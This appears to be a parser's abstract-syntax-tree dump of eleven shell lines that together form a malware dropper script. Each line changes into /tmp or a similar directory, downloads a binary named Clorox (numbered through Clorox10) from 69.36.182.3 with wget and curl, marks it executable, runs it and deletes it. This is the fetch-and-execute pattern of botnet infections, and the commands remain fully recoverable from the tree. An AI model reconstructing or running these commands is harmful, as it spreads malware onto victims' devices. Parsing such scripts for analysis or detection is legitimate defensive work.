ListNode(lineno=2, pos=(12, 174), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://69.36.182.3/Clorox'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 132), parts=[
    WordNode(lineno=2, pos=(99, 103), word='curl'),
    WordNode(lineno=2, pos=(104, 106), word='-O'),
    WordNode(lineno=2, pos=(107, 132), word='http://69.36.182.3/Clorox'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(132, 133)),
  CommandNode(lineno=2, pos=(134, 149), parts=[
    WordNode(lineno=2, pos=(134, 139), word='chmod'),
    WordNode(lineno=2, pos=(140, 142), word='+x'),
    WordNode(lineno=2, pos=(143, 149), word='Clorox'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(149, 150)),
  CommandNode(lineno=2, pos=(151, 159), parts=[
    WordNode(lineno=2, pos=(151, 159), word='./Clorox'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(159, 160)),
  CommandNode(lineno=2, pos=(161, 174), parts=[
    WordNode(lineno=2, pos=(161, 163), word='rm'),
    WordNode(lineno=2, pos=(164, 167), word='-rf'),
    WordNode(lineno=2, pos=(168, 174), word='Clorox'),
  ]),
])
ListNode(lineno=3, pos=(175, 342), parts=[
  CommandNode(lineno=3, pos=(175, 182), parts=[
    WordNode(lineno=3, pos=(175, 177), word='cd'),
    WordNode(lineno=3, pos=(178, 182), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(183, 185)),
  CommandNode(lineno=3, pos=(186, 197), parts=[
    WordNode(lineno=3, pos=(186, 188), word='cd'),
    WordNode(lineno=3, pos=(189, 197), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(198, 200)),
  CommandNode(lineno=3, pos=(201, 208), parts=[
    WordNode(lineno=3, pos=(201, 203), word='cd'),
    WordNode(lineno=3, pos=(204, 208), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(209, 211)),
  CommandNode(lineno=3, pos=(212, 220), parts=[
    WordNode(lineno=3, pos=(212, 214), word='cd'),
    WordNode(lineno=3, pos=(215, 220), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(221, 223)),
  CommandNode(lineno=3, pos=(224, 228), parts=[
    WordNode(lineno=3, pos=(224, 226), word='cd'),
    WordNode(lineno=3, pos=(227, 228), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(228, 229)),
  CommandNode(lineno=3, pos=(230, 261), parts=[
    WordNode(lineno=3, pos=(230, 234), word='wget'),
    WordNode(lineno=3, pos=(235, 261), word='http://69.36.182.3/Clorox1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(261, 262)),
  CommandNode(lineno=3, pos=(263, 297), parts=[
    WordNode(lineno=3, pos=(263, 267), word='curl'),
    WordNode(lineno=3, pos=(268, 270), word='-O'),
    WordNode(lineno=3, pos=(271, 297), word='http://69.36.182.3/Clorox1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(297, 298)),
  CommandNode(lineno=3, pos=(299, 315), parts=[
    WordNode(lineno=3, pos=(299, 304), word='chmod'),
    WordNode(lineno=3, pos=(305, 307), word='+x'),
    WordNode(lineno=3, pos=(308, 315), word='Clorox1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(315, 316)),
  CommandNode(lineno=3, pos=(317, 326), parts=[
    WordNode(lineno=3, pos=(317, 326), word='./Clorox1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(326, 327)),
  CommandNode(lineno=3, pos=(328, 342), parts=[
    WordNode(lineno=3, pos=(328, 330), word='rm'),
    WordNode(lineno=3, pos=(331, 334), word='-rf'),
    WordNode(lineno=3, pos=(335, 342), word='Clorox1'),
  ]),
])
ListNode(lineno=4, pos=(343, 510), parts=[
  CommandNode(lineno=4, pos=(343, 350), parts=[
    WordNode(lineno=4, pos=(343, 345), word='cd'),
    WordNode(lineno=4, pos=(346, 350), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(351, 353)),
  CommandNode(lineno=4, pos=(354, 365), parts=[
    WordNode(lineno=4, pos=(354, 356), word='cd'),
    WordNode(lineno=4, pos=(357, 365), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(366, 368)),
  CommandNode(lineno=4, pos=(369, 376), parts=[
    WordNode(lineno=4, pos=(369, 371), word='cd'),
    WordNode(lineno=4, pos=(372, 376), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(377, 379)),
  CommandNode(lineno=4, pos=(380, 388), parts=[
    WordNode(lineno=4, pos=(380, 382), word='cd'),
    WordNode(lineno=4, pos=(383, 388), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(389, 391)),
  CommandNode(lineno=4, pos=(392, 396), parts=[
    WordNode(lineno=4, pos=(392, 394), word='cd'),
    WordNode(lineno=4, pos=(395, 396), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(396, 397)),
  CommandNode(lineno=4, pos=(398, 429), parts=[
    WordNode(lineno=4, pos=(398, 402), word='wget'),
    WordNode(lineno=4, pos=(403, 429), word='http://69.36.182.3/Clorox2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(429, 430)),
  CommandNode(lineno=4, pos=(431, 465), parts=[
    WordNode(lineno=4, pos=(431, 435), word='curl'),
    WordNode(lineno=4, pos=(436, 438), word='-O'),
    WordNode(lineno=4, pos=(439, 465), word='http://69.36.182.3/Clorox2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(465, 466)),
  CommandNode(lineno=4, pos=(467, 483), parts=[
    WordNode(lineno=4, pos=(467, 472), word='chmod'),
    WordNode(lineno=4, pos=(473, 475), word='+x'),
    WordNode(lineno=4, pos=(476, 483), word='Clorox2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(483, 484)),
  CommandNode(lineno=4, pos=(485, 494), parts=[
    WordNode(lineno=4, pos=(485, 494), word='./Clorox2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(494, 495)),
  CommandNode(lineno=4, pos=(496, 510), parts=[
    WordNode(lineno=4, pos=(496, 498), word='rm'),
    WordNode(lineno=4, pos=(499, 502), word='-rf'),
    WordNode(lineno=4, pos=(503, 510), word='Clorox2'),
  ]),
])
ListNode(lineno=5, pos=(511, 678), parts=[
  CommandNode(lineno=5, pos=(511, 518), parts=[
    WordNode(lineno=5, pos=(511, 513), word='cd'),
    WordNode(lineno=5, pos=(514, 518), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(519, 521)),
  CommandNode(lineno=5, pos=(522, 533), parts=[
    WordNode(lineno=5, pos=(522, 524), word='cd'),
    WordNode(lineno=5, pos=(525, 533), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(534, 536)),
  CommandNode(lineno=5, pos=(537, 544), parts=[
    WordNode(lineno=5, pos=(537, 539), word='cd'),
    WordNode(lineno=5, pos=(540, 544), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(545, 547)),
  CommandNode(lineno=5, pos=(548, 556), parts=[
    WordNode(lineno=5, pos=(548, 550), word='cd'),
    WordNode(lineno=5, pos=(551, 556), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(557, 559)),
  CommandNode(lineno=5, pos=(560, 564), parts=[
    WordNode(lineno=5, pos=(560, 562), word='cd'),
    WordNode(lineno=5, pos=(563, 564), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(564, 565)),
  CommandNode(lineno=5, pos=(566, 597), parts=[
    WordNode(lineno=5, pos=(566, 570), word='wget'),
    WordNode(lineno=5, pos=(571, 597), word='http://69.36.182.3/Clorox3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(597, 598)),
  CommandNode(lineno=5, pos=(599, 633), parts=[
    WordNode(lineno=5, pos=(599, 603), word='curl'),
    WordNode(lineno=5, pos=(604, 606), word='-O'),
    WordNode(lineno=5, pos=(607, 633), word='http://69.36.182.3/Clorox3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(633, 634)),
  CommandNode(lineno=5, pos=(635, 651), parts=[
    WordNode(lineno=5, pos=(635, 640), word='chmod'),
    WordNode(lineno=5, pos=(641, 643), word='+x'),
    WordNode(lineno=5, pos=(644, 651), word='Clorox3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(651, 652)),
  CommandNode(lineno=5, pos=(653, 662), parts=[
    WordNode(lineno=5, pos=(653, 662), word='./Clorox3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(662, 663)),
  CommandNode(lineno=5, pos=(664, 678), parts=[
    WordNode(lineno=5, pos=(664, 666), word='rm'),
    WordNode(lineno=5, pos=(667, 670), word='-rf'),
    WordNode(lineno=5, pos=(671, 678), word='Clorox3'),
  ]),
])
ListNode(lineno=6, pos=(679, 846), parts=[
  CommandNode(lineno=6, pos=(679, 686), parts=[
    WordNode(lineno=6, pos=(679, 681), word='cd'),
    WordNode(lineno=6, pos=(682, 686), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(687, 689)),
  CommandNode(lineno=6, pos=(690, 701), parts=[
    WordNode(lineno=6, pos=(690, 692), word='cd'),
    WordNode(lineno=6, pos=(693, 701), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(702, 704)),
  CommandNode(lineno=6, pos=(705, 712), parts=[
    WordNode(lineno=6, pos=(705, 707), word='cd'),
    WordNode(lineno=6, pos=(708, 712), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(713, 715)),
  CommandNode(lineno=6, pos=(716, 724), parts=[
    WordNode(lineno=6, pos=(716, 718), word='cd'),
    WordNode(lineno=6, pos=(719, 724), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(725, 727)),
  CommandNode(lineno=6, pos=(728, 732), parts=[
    WordNode(lineno=6, pos=(728, 730), word='cd'),
    WordNode(lineno=6, pos=(731, 732), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(732, 733)),
  CommandNode(lineno=6, pos=(734, 765), parts=[
    WordNode(lineno=6, pos=(734, 738), word='wget'),
    WordNode(lineno=6, pos=(739, 765), word='http://69.36.182.3/Clorox4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(765, 766)),
  CommandNode(lineno=6, pos=(767, 801), parts=[
    WordNode(lineno=6, pos=(767, 771), word='curl'),
    WordNode(lineno=6, pos=(772, 774), word='-O'),
    WordNode(lineno=6, pos=(775, 801), word='http://69.36.182.3/Clorox4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(801, 802)),
  CommandNode(lineno=6, pos=(803, 819), parts=[
    WordNode(lineno=6, pos=(803, 808), word='chmod'),
    WordNode(lineno=6, pos=(809, 811), word='+x'),
    WordNode(lineno=6, pos=(812, 819), word='Clorox4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(819, 820)),
  CommandNode(lineno=6, pos=(821, 830), parts=[
    WordNode(lineno=6, pos=(821, 830), word='./Clorox4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(830, 831)),
  CommandNode(lineno=6, pos=(832, 846), parts=[
    WordNode(lineno=6, pos=(832, 834), word='rm'),
    WordNode(lineno=6, pos=(835, 838), word='-rf'),
    WordNode(lineno=6, pos=(839, 846), word='Clorox4'),
  ]),
])
ListNode(lineno=7, pos=(847, 1014), parts=[
  CommandNode(lineno=7, pos=(847, 854), parts=[
    WordNode(lineno=7, pos=(847, 849), word='cd'),
    WordNode(lineno=7, pos=(850, 854), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(855, 857)),
  CommandNode(lineno=7, pos=(858, 869), parts=[
    WordNode(lineno=7, pos=(858, 860), word='cd'),
    WordNode(lineno=7, pos=(861, 869), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(870, 872)),
  CommandNode(lineno=7, pos=(873, 880), parts=[
    WordNode(lineno=7, pos=(873, 875), word='cd'),
    WordNode(lineno=7, pos=(876, 880), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(881, 883)),
  CommandNode(lineno=7, pos=(884, 892), parts=[
    WordNode(lineno=7, pos=(884, 886), word='cd'),
    WordNode(lineno=7, pos=(887, 892), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(893, 895)),
  CommandNode(lineno=7, pos=(896, 900), parts=[
    WordNode(lineno=7, pos=(896, 898), word='cd'),
    WordNode(lineno=7, pos=(899, 900), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(900, 901)),
  CommandNode(lineno=7, pos=(902, 933), parts=[
    WordNode(lineno=7, pos=(902, 906), word='wget'),
    WordNode(lineno=7, pos=(907, 933), word='http://69.36.182.3/Clorox5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(933, 934)),
  CommandNode(lineno=7, pos=(935, 969), parts=[
    WordNode(lineno=7, pos=(935, 939), word='curl'),
    WordNode(lineno=7, pos=(940, 942), word='-O'),
    WordNode(lineno=7, pos=(943, 969), word='http://69.36.182.3/Clorox5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(969, 970)),
  CommandNode(lineno=7, pos=(971, 987), parts=[
    WordNode(lineno=7, pos=(971, 976), word='chmod'),
    WordNode(lineno=7, pos=(977, 979), word='+x'),
    WordNode(lineno=7, pos=(980, 987), word='Clorox5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(987, 988)),
  CommandNode(lineno=7, pos=(989, 998), parts=[
    WordNode(lineno=7, pos=(989, 998), word='./Clorox5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(998, 999)),
  CommandNode(lineno=7, pos=(1000, 1014), parts=[
    WordNode(lineno=7, pos=(1000, 1002), word='rm'),
    WordNode(lineno=7, pos=(1003, 1006), word='-rf'),
    WordNode(lineno=7, pos=(1007, 1014), word='Clorox5'),
  ]),
])
ListNode(lineno=8, pos=(1015, 1182), parts=[
  CommandNode(lineno=8, pos=(1015, 1022), parts=[
    WordNode(lineno=8, pos=(1015, 1017), word='cd'),
    WordNode(lineno=8, pos=(1018, 1022), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1023, 1025)),
  CommandNode(lineno=8, pos=(1026, 1037), parts=[
    WordNode(lineno=8, pos=(1026, 1028), word='cd'),
    WordNode(lineno=8, pos=(1029, 1037), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1038, 1040)),
  CommandNode(lineno=8, pos=(1041, 1048), parts=[
    WordNode(lineno=8, pos=(1041, 1043), word='cd'),
    WordNode(lineno=8, pos=(1044, 1048), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1049, 1051)),
  CommandNode(lineno=8, pos=(1052, 1060), parts=[
    WordNode(lineno=8, pos=(1052, 1054), word='cd'),
    WordNode(lineno=8, pos=(1055, 1060), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1061, 1063)),
  CommandNode(lineno=8, pos=(1064, 1068), parts=[
    WordNode(lineno=8, pos=(1064, 1066), word='cd'),
    WordNode(lineno=8, pos=(1067, 1068), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1068, 1069)),
  CommandNode(lineno=8, pos=(1070, 1101), parts=[
    WordNode(lineno=8, pos=(1070, 1074), word='wget'),
    WordNode(lineno=8, pos=(1075, 1101), word='http://69.36.182.3/Clorox6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1101, 1102)),
  CommandNode(lineno=8, pos=(1103, 1137), parts=[
    WordNode(lineno=8, pos=(1103, 1107), word='curl'),
    WordNode(lineno=8, pos=(1108, 1110), word='-O'),
    WordNode(lineno=8, pos=(1111, 1137), word='http://69.36.182.3/Clorox6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1137, 1138)),
  CommandNode(lineno=8, pos=(1139, 1155), parts=[
    WordNode(lineno=8, pos=(1139, 1144), word='chmod'),
    WordNode(lineno=8, pos=(1145, 1147), word='+x'),
    WordNode(lineno=8, pos=(1148, 1155), word='Clorox6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1155, 1156)),
  CommandNode(lineno=8, pos=(1157, 1166), parts=[
    WordNode(lineno=8, pos=(1157, 1166), word='./Clorox6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1166, 1167)),
  CommandNode(lineno=8, pos=(1168, 1182), parts=[
    WordNode(lineno=8, pos=(1168, 1170), word='rm'),
    WordNode(lineno=8, pos=(1171, 1174), word='-rf'),
    WordNode(lineno=8, pos=(1175, 1182), word='Clorox6'),
  ]),
])
ListNode(lineno=9, pos=(1183, 1350), parts=[
  CommandNode(lineno=9, pos=(1183, 1190), parts=[
    WordNode(lineno=9, pos=(1183, 1185), word='cd'),
    WordNode(lineno=9, pos=(1186, 1190), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1191, 1193)),
  CommandNode(lineno=9, pos=(1194, 1205), parts=[
    WordNode(lineno=9, pos=(1194, 1196), word='cd'),
    WordNode(lineno=9, pos=(1197, 1205), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1206, 1208)),
  CommandNode(lineno=9, pos=(1209, 1216), parts=[
    WordNode(lineno=9, pos=(1209, 1211), word='cd'),
    WordNode(lineno=9, pos=(1212, 1216), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1217, 1219)),
  CommandNode(lineno=9, pos=(1220, 1228), parts=[
    WordNode(lineno=9, pos=(1220, 1222), word='cd'),
    WordNode(lineno=9, pos=(1223, 1228), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1229, 1231)),
  CommandNode(lineno=9, pos=(1232, 1236), parts=[
    WordNode(lineno=9, pos=(1232, 1234), word='cd'),
    WordNode(lineno=9, pos=(1235, 1236), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1236, 1237)),
  CommandNode(lineno=9, pos=(1238, 1269), parts=[
    WordNode(lineno=9, pos=(1238, 1242), word='wget'),
    WordNode(lineno=9, pos=(1243, 1269), word='http://69.36.182.3/Clorox7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1269, 1270)),
  CommandNode(lineno=9, pos=(1271, 1305), parts=[
    WordNode(lineno=9, pos=(1271, 1275), word='curl'),
    WordNode(lineno=9, pos=(1276, 1278), word='-O'),
    WordNode(lineno=9, pos=(1279, 1305), word='http://69.36.182.3/Clorox7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1305, 1306)),
  CommandNode(lineno=9, pos=(1307, 1323), parts=[
    WordNode(lineno=9, pos=(1307, 1312), word='chmod'),
    WordNode(lineno=9, pos=(1313, 1315), word='+x'),
    WordNode(lineno=9, pos=(1316, 1323), word='Clorox7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1323, 1324)),
  CommandNode(lineno=9, pos=(1325, 1334), parts=[
    WordNode(lineno=9, pos=(1325, 1334), word='./Clorox7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1334, 1335)),
  CommandNode(lineno=9, pos=(1336, 1350), parts=[
    WordNode(lineno=9, pos=(1336, 1338), word='rm'),
    WordNode(lineno=9, pos=(1339, 1342), word='-rf'),
    WordNode(lineno=9, pos=(1343, 1350), word='Clorox7'),
  ]),
])
ListNode(lineno=10, pos=(1351, 1518), parts=[
  CommandNode(lineno=10, pos=(1351, 1358), parts=[
    WordNode(lineno=10, pos=(1351, 1353), word='cd'),
    WordNode(lineno=10, pos=(1354, 1358), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1359, 1361)),
  CommandNode(lineno=10, pos=(1362, 1373), parts=[
    WordNode(lineno=10, pos=(1362, 1364), word='cd'),
    WordNode(lineno=10, pos=(1365, 1373), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1374, 1376)),
  CommandNode(lineno=10, pos=(1377, 1384), parts=[
    WordNode(lineno=10, pos=(1377, 1379), word='cd'),
    WordNode(lineno=10, pos=(1380, 1384), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1385, 1387)),
  CommandNode(lineno=10, pos=(1388, 1396), parts=[
    WordNode(lineno=10, pos=(1388, 1390), word='cd'),
    WordNode(lineno=10, pos=(1391, 1396), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1397, 1399)),
  CommandNode(lineno=10, pos=(1400, 1404), parts=[
    WordNode(lineno=10, pos=(1400, 1402), word='cd'),
    WordNode(lineno=10, pos=(1403, 1404), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1404, 1405)),
  CommandNode(lineno=10, pos=(1406, 1437), parts=[
    WordNode(lineno=10, pos=(1406, 1410), word='wget'),
    WordNode(lineno=10, pos=(1411, 1437), word='http://69.36.182.3/Clorox8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1437, 1438)),
  CommandNode(lineno=10, pos=(1439, 1473), parts=[
    WordNode(lineno=10, pos=(1439, 1443), word='curl'),
    WordNode(lineno=10, pos=(1444, 1446), word='-O'),
    WordNode(lineno=10, pos=(1447, 1473), word='http://69.36.182.3/Clorox8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1473, 1474)),
  CommandNode(lineno=10, pos=(1475, 1491), parts=[
    WordNode(lineno=10, pos=(1475, 1480), word='chmod'),
    WordNode(lineno=10, pos=(1481, 1483), word='+x'),
    WordNode(lineno=10, pos=(1484, 1491), word='Clorox8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1491, 1492)),
  CommandNode(lineno=10, pos=(1493, 1502), parts=[
    WordNode(lineno=10, pos=(1493, 1502), word='./Clorox8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1502, 1503)),
  CommandNode(lineno=10, pos=(1504, 1518), parts=[
    WordNode(lineno=10, pos=(1504, 1506), word='rm'),
    WordNode(lineno=10, pos=(1507, 1510), word='-rf'),
    WordNode(lineno=10, pos=(1511, 1518), word='Clorox8'),
  ]),
])
ListNode(lineno=11, pos=(1519, 1686), parts=[
  CommandNode(lineno=11, pos=(1519, 1526), parts=[
    WordNode(lineno=11, pos=(1519, 1521), word='cd'),
    WordNode(lineno=11, pos=(1522, 1526), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1527, 1529)),
  CommandNode(lineno=11, pos=(1530, 1541), parts=[
    WordNode(lineno=11, pos=(1530, 1532), word='cd'),
    WordNode(lineno=11, pos=(1533, 1541), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1542, 1544)),
  CommandNode(lineno=11, pos=(1545, 1552), parts=[
    WordNode(lineno=11, pos=(1545, 1547), word='cd'),
    WordNode(lineno=11, pos=(1548, 1552), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1553, 1555)),
  CommandNode(lineno=11, pos=(1556, 1564), parts=[
    WordNode(lineno=11, pos=(1556, 1558), word='cd'),
    WordNode(lineno=11, pos=(1559, 1564), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1565, 1567)),
  CommandNode(lineno=11, pos=(1568, 1572), parts=[
    WordNode(lineno=11, pos=(1568, 1570), word='cd'),
    WordNode(lineno=11, pos=(1571, 1572), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1572, 1573)),
  CommandNode(lineno=11, pos=(1574, 1605), parts=[
    WordNode(lineno=11, pos=(1574, 1578), word='wget'),
    WordNode(lineno=11, pos=(1579, 1605), word='http://69.36.182.3/Clorox9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1605, 1606)),
  CommandNode(lineno=11, pos=(1607, 1641), parts=[
    WordNode(lineno=11, pos=(1607, 1611), word='curl'),
    WordNode(lineno=11, pos=(1612, 1614), word='-O'),
    WordNode(lineno=11, pos=(1615, 1641), word='http://69.36.182.3/Clorox9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1641, 1642)),
  CommandNode(lineno=11, pos=(1643, 1659), parts=[
    WordNode(lineno=11, pos=(1643, 1648), word='chmod'),
    WordNode(lineno=11, pos=(1649, 1651), word='+x'),
    WordNode(lineno=11, pos=(1652, 1659), word='Clorox9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1659, 1660)),
  CommandNode(lineno=11, pos=(1661, 1670), parts=[
    WordNode(lineno=11, pos=(1661, 1670), word='./Clorox9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1670, 1671)),
  CommandNode(lineno=11, pos=(1672, 1686), parts=[
    WordNode(lineno=11, pos=(1672, 1674), word='rm'),
    WordNode(lineno=11, pos=(1675, 1678), word='-rf'),
    WordNode(lineno=11, pos=(1679, 1686), word='Clorox9'),
  ]),
])
ListNode(lineno=12, pos=(1687, 1859), parts=[
  CommandNode(lineno=12, pos=(1687, 1694), parts=[
    WordNode(lineno=12, pos=(1687, 1689), word='cd'),
    WordNode(lineno=12, pos=(1690, 1694), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1695, 1697)),
  CommandNode(lineno=12, pos=(1698, 1709), parts=[
    WordNode(lineno=12, pos=(1698, 1700), word='cd'),
    WordNode(lineno=12, pos=(1701, 1709), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1710, 1712)),
  CommandNode(lineno=12, pos=(1713, 1720), parts=[
    WordNode(lineno=12, pos=(1713, 1715), word='cd'),
    WordNode(lineno=12, pos=(1716, 1720), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1721, 1723)),
  CommandNode(lineno=12, pos=(1724, 1732), parts=[
    WordNode(lineno=12, pos=(1724, 1726), word='cd'),
    WordNode(lineno=12, pos=(1727, 1732), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1733, 1735)),
  CommandNode(lineno=12, pos=(1736, 1740), parts=[
    WordNode(lineno=12, pos=(1736, 1738), word='cd'),
    WordNode(lineno=12, pos=(1739, 1740), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1740, 1741)),
  CommandNode(lineno=12, pos=(1742, 1774), parts=[
    WordNode(lineno=12, pos=(1742, 1746), word='wget'),
    WordNode(lineno=12, pos=(1747, 1774), word='http://69.36.182.3/Clorox10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1774, 1775)),
  CommandNode(lineno=12, pos=(1776, 1811), parts=[
    WordNode(lineno=12, pos=(1776, 1780), word='curl'),
    WordNode(lineno=12, pos=(1781, 1783), word='-O'),
    WordNode(lineno=12, pos=(1784, 1811), word='http://69.36.182.3/Clorox10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1811, 1812)),
  CommandNode(lineno=12, pos=(1813, 1830), parts=[
    WordNode(lineno=12, pos=(1813, 1818), word='chmod'),
    WordNode(lineno=12, pos=(1819, 1821), word='+x'),
    WordNode(lineno=12, pos=(1822, 1830), word='Clorox10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1830, 1831)),
  CommandNode(lineno=12, pos=(1832, 1842), parts=[
    WordNode(lineno=12, pos=(1832, 1842), word='./Clorox10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1842, 1843)),
  CommandNode(lineno=12, pos=(1844, 1859), parts=[
    WordNode(lineno=12, pos=(1844, 1846), word='rm'),
    WordNode(lineno=12, pos=(1847, 1850), word='-rf'),
    WordNode(lineno=12, pos=(1851, 1859), word='Clorox10'),
  ]),
])
